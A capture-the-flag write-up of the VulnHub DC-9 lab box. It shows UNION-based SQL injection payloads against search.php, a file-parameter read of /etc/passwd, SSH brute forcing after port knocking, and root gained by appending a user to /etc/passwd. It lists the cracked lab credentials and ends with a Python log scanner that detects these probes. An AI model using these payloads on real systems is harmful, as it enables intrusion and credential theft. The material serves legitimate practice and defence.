# Vulnhub-DC 9

## NMAP

```bash
nmap -sC -sV 192.168.1.7
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-16 09:31 PKT
Nmap scan report for 192.168.1.7
Host is up (0.00021s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)
|   256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)
|_  256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 08:00:27:1B:8F:38 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## PORT 80 (HTTP)

Going to `Display All Records` we can see information about the users.

There is a login page, so let's try some basic SQLi. I tried `admin ' or 1=1 #` and `admin' or 1=1 -- `, but both failed.

Going over to `search.php` we can see that it searches for a name, so let's supply the name `mary`, since information for that user exists.

Here let's perform the query `mary' and 1=1 # ` to see if it still returns mary's information. It does, so we can SQLi here, but first we need to identify how many columns there are. To do that we are going to utilize `order by`, which sorts by the column number provided; we keep increasing the number until we get no response:

```
mary' order by 1 #
```

I kept getting results up to 6 columns, but after that I get no response, which means we have 6 columns. So we can now perform the SQL injection:

```
mary' union select version(),user(),database(),4,5,6 #
```

This machine is using MariaDB, the database client user is `dbuser` and the database name is `Staff`. Now we need to extract the table names, then the columns, and then exfiltrate the data.

We can perform a query to give us the names of all databases:

```
mary' union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata #
```

So there are two databases, but right now let's just focus on `Staff`:

```
mary' union select group_concat(table_name),2,3,4,5,6 from information_schema.tables where table_schema=database() #
```

We have two tables, `StaffDetails` and `Users`, so let's see the column names for the `Users` table:

```
mary' union select group_concat(column_name),2,3,4,5,6 from information_schema.columns where table_name='Users' #
```

We have the column names; we are interested in username and password, so let's just extract the data. And we got the usernames and password hashes. This could have been done easily with sqlmap by intercepting the request from `search.php`, saving it to a file and running sqlmap against it.

Let's visit crackstation.

As soon as we log in we'll get an error. I tried the parameter `file` and got the contents of `/etc/passwd`, so I copied the results into a file and grabbed the users only.

Now remember that we had 2 databases, `Staff` and `users`; let's use sqlmap to dump the data from the `users` database. I have already saved the usernames, so let's just grab the passwords and start brute forcing against SSH.

But SSH is filtered, so we are first going to see whether we can find a port knocking configuration or not. Now we can perform port knocking to open the SSH port.

We found 2 passwords with brute forcing. After logging in with `janitor` we can find more passwords. Let's add those passwords and try brute forcing again.

Switching to user `fredf`, we can see that we can run the file `test` as sudo. It's a binary, so let's try to execute it and see what happens.

Weird, it says `test.py`, which is a python file which reads and appends, so we need to find that python file. And we found it.

Going through the source code, it takes 2 arguments as files: it reads the contents of the first file, stores them in a variable, then appends them to the file we specify. We could exploit this by first adding a root user in a file, then reading the contents from there and appending them to the `/etc/passwd` file.

Now let's see if this actually worked or not. This has added a user, so we can switch to this user and become root.

Credentials found along the way:

```
admin:transorbital1
chandlerb:UrAG0D!
janitor: Ilovepeepee
joeyt: Passw0rd
fredf: B4-Tru3-001
```

Queries used:

```
mary' union select 1,2,3,4,5,6 #
mary' union select group_concat(table_name),2,3,4,5,6 from information_schema.tables where table_schema=database() #
mary' union select group_concat(column_name),2,3,4,5,6 from information_schema.columns where table_name='Users' #
mary' union select group_concat(Username),group_concat(Password),3,4,5,6 from 'Users' #
mary' union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata #
```
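A defender's counterpart to the `search.php` injection and the `file` parameter read above: an added example, not part of the original writeup, that scans Apache access-log lines for the `order by` / `union select` probes, traversal to `/etc/passwd` and the sqlmap User-Agent. The log lines are constructed, the parameters are assumed to arrive in the GET query string (a POSTed form body never appears in the access log, which is the caveat to keep in mind), and `/welcome.php` is a placeholder path, not one taken from the box.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Signatures for the probing techniques used against search.php above.
SQLI_PATTERNS = [
    re.compile(r"\bunion\b.{0,40}\bselect\b", re.I),
    re.compile(r"information_schema\.", re.I),
    re.compile(r"\border\s+by\s+\d+", re.I),
    re.compile(r"'\s*(and|or)\s+\d+\s*=\s*\d+", re.I),
]
# Traversal / direct read of /etc/passwd through a file-style parameter.
LFI_PATTERN = re.compile(r"(\.\./|/etc/passwd)", re.I)

# Constructed Apache combined-format lines (sample data, not from the page).
SAMPLE_LOG = """\
192.168.1.5 - - [16/May/2021:09:40:01 +0500] "GET /search.php?search=mary HTTP/1.1" 200 1432 "-" "Mozilla/5.0"
192.168.1.5 - - [16/May/2021:09:41:12 +0500] "GET /search.php?search=mary%27+order+by+7+%23 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.5 - - [16/May/2021:09:42:30 +0500] "GET /search.php?search=mary%27+union+select+version%28%29%2Cuser%28%29%2Cdatabase%28%29%2C4%2C5%2C6+%23 HTTP/1.1" 200 1510 "-" "Mozilla/5.0"
192.168.1.5 - - [16/May/2021:09:50:07 +0500] "GET /welcome.php?file=../../../../etc/passwd HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
192.168.1.5 - - [16/May/2021:09:55:19 +0500] "GET /search.php?search=mary HTTP/1.1" 200 1432 "-" "sqlmap/1.5.4#stable (http://sqlmap.org)"
"""

# ip, method, request target, status, user-agent from a combined-format line.
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"'
)


def classify_request(line):
    """Return a list of (ip, reason) findings for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    ip, _method, target, _status, agent = m.groups()
    findings = []
    # parse_qs URL-decodes, so %27 / %28 / + become the literal payload text.
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            if any(p.search(value) for p in SQLI_PATTERNS):
                findings.append((ip, f"sqli in {name}"))
            if LFI_PATTERN.search(value):
                findings.append((ip, f"lfi in {name}"))
    if "sqlmap" in agent.lower():
        findings.append((ip, "sqlmap user-agent"))
    return findings


def scan_log(text):
    """Run classify_request over every line and collect the alerts."""
    alerts = []
    for line in text.splitlines():
        alerts.extend(classify_request(line))
    return alerts
```

Feeding the constructed sample through `scan_log` flags the `order by` and `union select` probes, the `/etc/passwd` traversal and the sqlmap request, and leaves the plain `search=mary` lookup alone.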